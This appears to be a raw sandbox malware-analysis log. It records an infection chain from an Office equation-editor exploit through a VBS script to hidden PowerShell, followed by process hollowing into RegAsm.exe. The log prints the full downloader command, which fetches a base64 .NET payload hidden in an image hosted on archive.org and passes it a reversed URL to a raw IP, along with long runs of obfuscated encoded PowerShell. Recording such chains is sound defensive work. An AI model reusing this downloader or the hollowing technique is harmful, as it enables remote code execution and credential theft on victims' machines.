? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?QgB5? ? ? ? ?HQ? ? ? ? ?ZQBz? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?CQ? ? ? ? ?dwBl? ? ? ? ?GI? ? ? ? ?QwBs? ? ? ? ?Gk? ? ? ? ?ZQBu? ? ? ? ?HQ? ? ? ? ?LgBE? ? ? ? ?G8? ? ? ? ?dwBu? ? ? ? ?Gw? ? ? ? ?bwBh? ? ? ? ?GQ? ? ? ? ?R? ? ? ? ?Bh? ? ? ? ?HQ? ? ? ? ?YQ? ? ? ? ?o? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?FU? ? ? ? ?cgBs? ? ? ? ?Ck? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBU? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?B0? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Fs? ? ? ? ?UwB5? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?G0? ? ? ? ?LgBU? ? ? ? ?GU? ? 
? ? ?e? ? ? ? ?B0? ? ? ? ?C4? ? ? ? ?RQBu? ? ? ? ?GM? ? ? ? ?bwBk? ? ? ? ?Gk? ? ? ? ?bgBn? ? ? ? ?F0? ? ? ? ?Og? ? ? ? ?6? ? ? ? ?FU? ? ? ? ?V? ? ? ? ?BG? ? ? ? ?Dg? ? ? ? ?LgBH? ? ? ? ?GU? ? ? ? ?d? ? ? ? ?BT? ? ? ? ?HQ? ? ? ? ?cgBp? ? ? ? ?G4? ? ? ? ?Zw? ? ? ? ?o? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?EI? ? ? ? ?eQB0? ? ? ? ?GU? ? ? ? ?cw? ? ? ? ?p? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bz? ? ? ? ?HQ? ? ? ? ?YQBy? ? ? ? ?HQ? ? ? ? ?RgBs? ? ? ? ?GE? ? ? ? ?Zw? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?n? ? ? ? ?Dw? ? ? ? ?P? ? ? ? ?BC? ? ? ? ?EE? ? ? ? ?UwBF? ? ? ? ?DY? ? ? ? ?N? ? ? ? ?Bf? ? ? ? ?FM? ? ? ? ?V? ? ? ? ?BB? ? ? ? ?FI? ? ? ? ?V? ? ? ? ?? ? ? ? ?+? ? ? ? ?D4? ? ? ? ?Jw? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?ZQBu? ? ? ? ?GQ? ? ? ? ?RgBs? ? ? ? ?GE? ? ? ? ?Zw? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?n? ? ? ? ?Dw? ? ? ? ?P? ? ? ? ?BC? ? ? ? ?EE? ? ? ? ?UwBF? ? ? ? ?DY? ? ? ? ?N? ? ? ? ?Bf? ? ? ? ?EU? ? ? ? ?TgBE? ? ? ? ?D4? ? ? ? ?Pg? ? ? ? ?n? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bz? ? ? ? ?HQ? ? ? ? ?YQBy? ? ? ? ?HQ? ? ? ? ?SQBu? ? ? ? ?GQ? ? ? ?
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 8_2_0041812A GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,CreateProcessW,VirtualAlloc,GetThreadContext,ReadProcessMemory,NtCreateSection,NtUnmapViewOfSection,NtMapViewOfSection,VirtualFree,NtClose,TerminateProcess,GetModuleHandleA,GetProcAddress,GetCurrentProcess,NtMapViewOfSection,WriteProcessMemory,SetThreadContext,ResumeThread,VirtualFree,GetCurrentProcess,NtUnmapViewOfSection,NtClose,TerminateProcess,GetLastError, 8_2_0041812A
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe protection: execute and read and write
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe protection: execute and read and write
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe protection: execute and read and write
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 459000
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 471000
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 477000
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 478000
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 479000
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 47E000
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 7EFDE008
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe 8_2_00412132
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 8_2_00419662 mouse_event, 8_2_00419662
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\escreenthepicturewithbutters.vBS"
                  Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?Z? ? ? ? ?Bv? ? ? ? ?Hc? ? ? ? ?bgBs? ? ? ? ?G8? ? ? ? ?YQBk? ? ? ? ?C8? ? ? ? ?bgBl? ? ? ? ?Hc? ? ? ? ?XwBp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?XwB2? ? ? ? ?GI? ? ? ? ?cw? ? ? ? ?v? ? ? ? ?G4? ? ? ? ?ZQB3? ? ? ? ?F8? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?F8? ? ? ? ?dgBi? ? ? ? ?HM? ? ? ? ?LgBq? ? ? ? ?H? ? ? ? ?? ? ? ? ?Zw? ? ? ? ?n? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?B3? ? ? ? ?GU? ? ? ? ?YgBD? ? ? ? ?Gw? ? ? ? ?aQBl? ? ? ? ?G4? ? ? ? ?d? ? ? ? ?? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?BO? ? ? ? ?GU? ? ? ? ?dw? ? ? ? ?t? ? ? ? ?E8? ? ? ? ?YgBq? ? ? ? ?GU? ? ? ? ?YwB0? ? ? ? ?C? ? ? ? ?? ? ? ? ?UwB5? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?G0? ? ? ? ?LgBO? ? ? ? ?GU? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?Fc? ? ? ? ?ZQBi? ? ? ? ?EM? ? ? ? ?b? ? ? ? ?Bp? ? ? ? ?GU? ? ? ? ?bgB0? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?QgB5? ? ? ? ?HQ? ? ? ? ?ZQBz? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?CQ? ? ? ? ?dwBl? ? ? ? ?GI? ? ? ? ?QwBs? ? ? ? ?Gk? ? ? ? ?ZQBu? ? ? ? ?HQ? ? ? ? ?LgBE? ? ? ? ?G8? ? ? ? ?dwBu? ? ? ? ?Gw? ? ? ? ?bwBh? ? ? ? ?GQ? ? ? ? ?R? ? ? ? ?Bh? ? ? ? ?HQ? ? ? ? ?YQ? ? ? ? ?o? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?FU? ? ? ? ?cgBs? ? ? ? ?Ck? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBU? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?B0? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Fs? ? ? ? ?UwB5? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?G0? ? ? ? ?LgBU? ? ? ? ?GU? ? 
? ? ?e? ? ? ? ?B0? ? ? ? ?C4? ? ? ? ?RQBu? ? ? ? ?GM? ? ? ? ?bwBk? ? ? ? ?Gk? ? ? ? ?bgBn? ? ? ? ?F0? ? ? ? ?Og? ? ? ? ?6? ? ? ? ?FU? ? ? ? ?V? ? ? ? ?BG? ? ? ? ?Dg? ? ? ? ?LgBH? ? ? ? ?GU? ? ? ? ?d? ? ? ? ?BT? ? ? ? ?HQ? ? ? ? ?cgBp? ? ? ? ?G4? ? ? ? ?Zw? ? ? ? ?o? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?EI? ? ? ? ?eQB0? ? ? ? ?GU? ? ? ? ?cw? ? ? ? ?p? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bz? ? ? ? ?HQ? ? ? ? ?YQBy? ? ? ? ?HQ? ? ? ? ?RgBs? ? ? ? ?GE? ? ? ? ?Zw? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?n? ? ? ? ?Dw? ? ? ? ?P? ? ? ? ?BC? ? ? ? ?EE? ? ? ? ?UwBF? ? ? ? ?DY? ? ? ? ?N? ? ? ? ?Bf? ? ? ? ?FM? ? ? ? ?V? ? ? ? ?BB? ? ? ? ?FI? ? ? ? ?V? ? ? ? ?? ? ? ? ?+? ? ? ? ?D4? ? ? ? ?Jw? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?ZQBu? ? ? ? ?GQ? ? ? ? ?RgBs? ? ? ? ?GE? ? ? ? ?Zw? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?n? ? ? ? ?Dw? ? ? ? ?P? ? ? ? ?BC? ? ? ? ?EE? ? ? ? ?UwBF? ? ? ? ?DY? ? ? ? ?N? ? ? ? ?Bf? ? ? ? ?EU? ? ? ? ?TgBE? ? ? ? ?D4? ? ? ? ?Pg? ? ? ? ?n? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bz? ? ? ? ?HQ? ? ? ? ?YQBy? ? ? ? ?HQ? ? ? ? ?SQBu? ? ? ? ?GQ? ? ? ?Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://archive.org/download/new_image_vbs/new_image_vbs.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.GFFREW/53/481.142.932.58//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))"
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\grmnuvnmumxdrrgkqp"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\rtrfuoyfiupqcguozzwaq"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\towqvgihwchvemqsikjctbjd"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\towqvgihwchvemqsikjctbjd"
                  Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'j? ? ? ? ?bp? ? ? ? ?g0? ? ? ? ?yqbn? ? ? ? ?gu? ? ? ? ?vqby? ? ? ? ?gw? ? ? ? ?i? ? ? ? ?? ? ? ? ?9? ? ? ? ?c? ? ? ? ?? ? ? ? ?jwbo? ? ? ? ?hq? ? ? ? ?d? ? ? ? ?bw? ? ? ? ?hm? ? ? ? ?og? ? ? ? ?v? ? ? ? ?c8? ? ? ? ?yqby? ? ? ? ?gm? ? ? ? ?a? ? ? ? ?bp? ? ? ? ?hy? ? ? ? ?zq? ? ? ? ?u? ? ? ? ?g8? ? ? ? ?cgbn? ? ? ? ?c8? ? ? ? ?z? ? ? ? ?bv? ? ? ? ?hc? ? ? ? ?bgbs? ? ? ? ?g8? ? ? ? ?yqbk? ? ? ? ?c8? ? ? ? ?bgbl? ? ? ? ?hc? ? ? ? ?xwbp? ? ? ? ?g0? ? ? ? ?yqbn? ? ? ? ?gu? ? ? ? ?xwb2? ? ? ? ?gi? ? ? ? ?cw? ? ? ? ?v? ? ? ? ?g4? ? ? ? ?zqb3? ? ? ? ?f8? ? ? ? ?aqbt? ? ? ? ?ge? ? ? ? ?zwbl? ? ? ? ?f8? ? ? ? ?dgbi? ? ? ? ?hm? ? ? ? ?lgbq? ? ? ? ?h? ? ? ? ?? ? ? ? ?zw? ? ? ? ?n? ? ? ? ?ds? ? ? ? ?j? ? ? ? ?b3? ? ? ? ?gu? ? ? ? ?ygbd? ? ? ? ?gw? ? ? ? ?aqbl? ? ? ? ?g4? ? ? ? ?d? ? ? ? ?? ? ? ? ?g? ? ? ? ?d0? ? ? ? ?i? ? ? ? ?bo? ? ? ? ?gu? ? ? ? ?dw? ? ? ? ?t? ? ? ? ?e8? ? ? ? ?ygbq? ? ? ? ?gu? ? ? ? ?ywb0? ? ? ? ?c? ? ? ? ?? ? ? ? ?uwb5? ? ? ? ?hm? ? ? ? ?d? ? ? ? ?bl? ? ? ? ?g0? ? ? ? ?lgbo? ? ? ? ?gu? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?fc? ? ? ? ?zqbi? ? ? ? ?em? ? ? ? ?b? ? ? ? ?bp? ? ? ? ?gu? ? ? ? ?bgb0? ? ? ? ?ds? ? ? ? ?j? ? ? ? ?bp? ? ? ? ?g0? ? ? ? ?yqbn? ? ? ? ?gu? ? ? ? ?qgb5? ? ? ? ?hq? ? ? ? ?zqbz? ? ? ? ?c? ? ? ? ?? ? ? ? ?pq? ? ? ? ?g? ? ? ? ?cq? ? ? ? ?dwbl? ? ? ? ?gi? ? ? ? ?qwbs? ? ? ? ?gk? ? ? ? ?zqbu? ? ? ? ?hq? ? ? ? ?lgbe? ? ? ? ?g8? ? ? ? ?dwbu? ? ? ? ?gw? ? ? ? ?bwbh? ? ? ? ?gq? ? ? ? ?r? ? ? ? ?bh? ? ? ? ?hq? ? ? ? ?yq? ? ? ? ?o? ? ? ? ?cq? ? ? ? ?aqbt? ? ? ? ?ge? ? ? ? ?zwbl? ? ? ? ?fu? ? ? ? ?cgbs? ? ? ? ?ck? ? ? ? ?ow? ? ? ? ?k? ? ? ? ?gk? ? ? ? ?bqbh? ? ? ? ?gc? ? ? ? ?zqbu? ? ? ? ?gu? ? ? ? ?e? ? ? ? ?b0? ? ? ? ?c? ? ? ? ?? ? ? ? ?pq? ? ? ? ?g? ? ? ? ?fs? ? ? ? ?uwb5? ? ? ? ?hm? ? ? ? ?d? ? ? ? ?bl? ? ? ? ?g0? ? ? ? ?lgbu? ? ? ? ?gu? ? 
? ? ?e? ? ? ? ?b0? ? ? ? ?c4? ? ? ? ?rqbu? ? ? ? ?gm? ? ? ? ?bwbk? ? ? ? ?gk? ? ? ? ?bgbn? ? ? ? ?f0? ? ? ? ?og? ? ? ? ?6? ? ? ? ?fu? ? ? ? ?v? ? ? ? ?bg? ? ? ? ?dg? ? ? ? ?lgbh? ? ? ? ?gu? ? ? ? ?d? ? ? ? ?bt? ? ? ? ?hq? ? ? ? ?cgbp? ? ? ? ?g4? ? ? ? ?zw? ? ? ? ?o? ? ? ? ?cq? ? ? ? ?aqbt? ? ? ? ?ge? ? ? ? ?zwbl? ? ? ? ?ei? ? ? ? ?eqb0? ? ? ? ?gu? ? ? ? ?cw? ? ? ? ?p? ? ? ? ?ds? ? ? ? ?j? ? ? ? ?bz? ? ? ? ?hq? ? ? ? ?yqby? ? ? ? ?hq? ? ? ? ?rgbs? ? ? ? ?ge? ? ? ? ?zw? ? ? ? ?g? ? ? ? ?d0? ? ? ? ?i? ? ? ? ?? ? ? ? ?n? ? ? ? ?dw? ? ? ? ?p? ? ? ? ?bc? ? ? ? ?ee? ? ? ? ?uwbf? ? ? ? ?dy? ? ? ? ?n? ? ? ? ?bf? ? ? ? ?fm? ? ? ? ?v? ? ? ? ?bb? ? ? ? ?fi? ? ? ? ?v? ? ? ? ?? ? ? ? ?+? ? ? ? ?d4? ? ? ? ?jw? ? ? ? ?7? ? ? ? ?cq? ? ? ? ?zqbu? ? ? ? ?gq? ? ? ? ?rgbs? ? ? ? ?ge? ? ? ? ?zw? ? ? ? ?g? ? ? ? ?d0? ? ? ? ?i? ? ? ? ?? ? ? ? ?n? ? ? ? ?dw? ? ? ? ?p? ? ? ? ?bc? ? ? ? ?ee? ? ? ? ?uwbf? ? ? ? ?dy? ? ? ? ?n? ? ? ? ?bf? ? ? ? ?eu? ? ? ? ?tgbe? ? ? ? ?d4? ? ? ? ?pg? ? ? ? ?n? ? ? ? ?ds? ? ? ? ?j? ? ? ? ?bz? ? ? ? ?hq? ? ? ? ?yqby? ? ? ? ?hq? ? ? ? ?sqbu? ? ? ? ?gq? ? ? ?
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "$imageurl = 'https://archive.org/download/new_image_vbs/new_image_vbs.jpg';$webclient = new-object system.net.webclient;$imagebytes = $webclient.downloaddata($imageurl);$imagetext = [system.text.encoding]::utf8.getstring($imagebytes);$startflag = '<<base64_start>>';$endflag = '<<base64_end>>';$startindex = $imagetext.indexof($startflag);$endindex = $imagetext.indexof($endflag);$startindex -ge 0 -and $endindex -gt $startindex;$startindex += $startflag.length;$base64length = $endindex - $startindex;$base64command = $imagetext.substring($startindex, $base64length);$commandbytes = [system.convert]::frombase64string($base64command);$loadedassembly = [system.reflection.assembly]::load($commandbytes);$type = $loadedassembly.gettype('dnlib.io.home');$method = $type.getmethod('vai').invoke($null, [object[]] ('txt.gffrew/53/481.142.932.58//:ptth' , 'desativado' , 'desativado' , 'desativado','regasm',''))"
                  Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'j? ? ? ? ?bp? ? ? ? ?g0? ? ? ? ?yqbn? ? ? ? ?gu? ? ? ? ?vqby? ? ? ? ?gw? ? ? ? ?i? ? ? ? ?? ? ? ? ?9? ? ? ? ?c? ? ? ? ?? ? ? ? ?jwbo? ? ? ? ?hq? ? ? ? ?d? ? ? ? ?bw? ? ? ? ?hm? ? ? ? ?og? ? ? ? ?v? ? ? ? ?c8? ? ? ? ?yqby? ? ? ? ?gm? ? ? ? ?a? ? ? ? ?bp? ? ? ? ?hy? ? ? ? ?zq? ? ? ? ?u? ? ? ? ?g8? ? ? ? ?cgbn? ? ? ? ?c8? ? ? ? ?z? ? ? ? ?bv? ? ? ? ?hc? ? ? ? ?bgbs? ? ? ? ?g8? ? ? ? ?yqbk? ? ? ? ?c8? ? ? ? ?bgbl? ? ? ? ?hc? ? ? ? ?xwbp? ? ? ? ?g0? ? ? ? ?yqbn? ? ? ? ?gu? ? ? ? ?xwb2? ? ? ? ?gi? ? ? ? ?cw? ? ? ? ?v? ? ? ? ?g4? ? ? ? ?zqb3? ? ? ? ?f8? ? ? ? ?aqbt? ? ? ? ?ge? ? ? ? ?zwbl? ? ? ? ?f8? ? ? ? ?dgbi? ? ? ? ?hm? ? ? ? ?lgbq? ? ? ? ?h? ? ? ? ?? ? ? ? ?zw? ? ? ? ?n? ? ? ? ?ds? ? ? ? ?j? ? ? ? ?b3? ? ? ? ?gu? ? ? ? ?ygbd? ? ? ? ?gw? ? ? ? ?aqbl? ? ? ? ?g4? ? ? ? ?d? ? ? ? ?? ? ? ? ?g? ? ? ? ?d0? ? ? ? ?i? ? ? ? ?bo? ? ? ? ?gu? ? ? ? ?dw? ? ? ? ?t? ? ? ? ?e8? ? ? ? ?ygbq? ? ? ? ?gu? ? ? ? ?ywb0? ? ? ? ?c? ? ? ? ?? ? ? ? ?uwb5? ? ? ? ?hm? ? ? ? ?d? ? ? ? ?bl? ? ? ? ?g0? ? ? ? ?lgbo? ? ? ? ?gu? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?fc? ? ? ? ?zqbi? ? ? ? ?em? ? ? ? ?b? ? ? ? ?bp? ? ? ? ?gu? ? ? ? ?bgb0? ? ? ? ?ds? ? ? ? ?j? ? ? ? ?bp? ? ? ? ?g0? ? ? ? ?yqbn? ? ? ? ?gu? ? ? ? ?qgb5? ? ? ? ?hq? ? ? ? ?zqbz? ? ? ? ?c? ? ? ? ?? ? ? ? ?pq? ? ? ? ?g? ? ? ? ?cq? ? ? ? ?dwbl? ? ? ? ?gi? ? ? ? ?qwbs? ? ? ? ?gk? ? ? ? ?zqbu? ? ? ? ?hq? ? ? ? ?lgbe? ? ? ? ?g8? ? ? ? ?dwbu? ? ? ? ?gw? ? ? ? ?bwbh? ? ? ? ?gq? ? ? ? ?r? ? ? ? ?bh? ? ? ? ?hq? ? ? ? ?yq? ? ? ? ?o? ? ? ? ?cq? ? ? ? ?aqbt? ? ? ? ?ge? ? ? ? ?zwbl? ? ? ? ?fu? ? ? ? ?cgbs? ? ? ? ?ck? ? ? ? ?ow? ? ? ? ?k? ? ? ? ?gk? ? ? ? ?bqbh? ? ? ? ?gc? ? ? ? ?zqbu? ? ? ? ?gu? ? ? ? ?e? ? ? ? ?b0? ? ? ? ?c? ? ? ? ?? ? ? ? ?pq? ? ? ? ?g? ? ? ? ?fs? ? ? ? ?uwb5? ? ? ? ?hm? ? ? ? ?d? ? ? ? ?bl? ? ? ? ?g0? ? ? ? ?lgbu? ? ? ? ?gu? ? 
? ? ?e? ? ? ? ?b0? ? ? ? ?c4? ? ? ? ?rqbu? ? ? ? ?gm? ? ? ? ?bwbk? ? ? ? ?gk? ? ? ? ?bgbn? ? ? ? ?f0? ? ? ? ?og? ? ? ? ?6? ? ? ? ?fu? ? ? ? ?v? ? ? ? ?bg? ? ? ? ?dg? ? ? ? ?lgbh? ? ? ? ?gu? ? ? ? ?d? ? ? ? ?bt? ? ? ? ?hq? ? ? ? ?cgbp? ? ? ? ?g4? ? ? ? ?zw? ? ? ? ?o? ? ? ? ?cq? ? ? ? ?aqbt? ? ? ? ?ge? ? ? ? ?zwbl? ? ? ? ?ei? ? ? ? ?eqb0? ? ? ? ?gu? ? ? ? ?cw? ? ? ? ?p? ? ? ? ?ds? ? ? ? ?j? ? ? ? ?bz? ? ? ? ?hq? ? ? ? ?yqby? ? ? ? ?hq? ? ? ? ?rgbs? ? ? ? ?ge? ? ? ? ?zw? ? ? ? ?g? ? ? ? ?d0? ? ? ? ?i? ? ? ? ?? ? ? ? ?n? ? ? ? ?dw? ? ? ? ?p? ? ? ? ?bc? ? ? ? ?ee? ? ? ? ?uwbf? ? ? ? ?dy? ? ? ? ?n? ? ? ? ?bf? ? ? ? ?fm? ? ? ? ?v? ? ? ? ?bb? ? ? ? ?fi? ? ? ? ?v? ? ? ? ?? ? ? ? ?+? ? ? ? ?d4? ? ? ? ?jw? ? ? ? ?7? ? ? ? ?cq? ? ? ? ?zqbu? ? ? ? ?gq? ? ? ? ?rgbs? ? ? ? ?ge? ? ? ? ?zw? ? ? ? ?g? ? ? ? ?d0? ? ? ? ?i? ? ? ? ?? ? ? ? ?n? ? ? ? ?dw? ? ? ? ?p? ? ? ? ?bc? ? ? ? ?ee? ? ? ? ?uwbf? ? ? ? ?dy? ? ? ? ?n? ? ? ? ?bf? ? ? ? ?eu? ? ? ? ?tgbe? ? ? ? ?d4? ? ? ? ?pg? ? ? ? ?n? ? ? ? ?ds? ? ? ? ?j? ? ? ? ?bz? ? ? ? ?hq? ? ? ? ?yqby? ? ? ? ?hq? ? ? ? ?sqbu? ? ? ? ?gq? ? ? ?Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "$imageurl = 'https://archive.org/download/new_image_vbs/new_image_vbs.jpg';$webclient = new-object system.net.webclient;$imagebytes = $webclient.downloaddata($imageurl);$imagetext = [system.text.encoding]::utf8.getstring($imagebytes);$startflag = '<<base64_start>>';$endflag = '<<base64_end>>';$startindex = $imagetext.indexof($startflag);$endindex = $imagetext.indexof($endflag);$startindex -ge 0 -and $endindex -gt $startindex;$startindex += $startflag.length;$base64length = $endindex - $startindex;$base64command = $imagetext.substring($startindex, $base64length);$commandbytes = [system.convert]::frombase64string($base64command);$loadedassembly = [system.reflection.assembly]::load($commandbytes);$type = $loadedassembly.gettype('dnlib.io.home');$method = $type.getmethod('vai').invoke($null, [object[]] 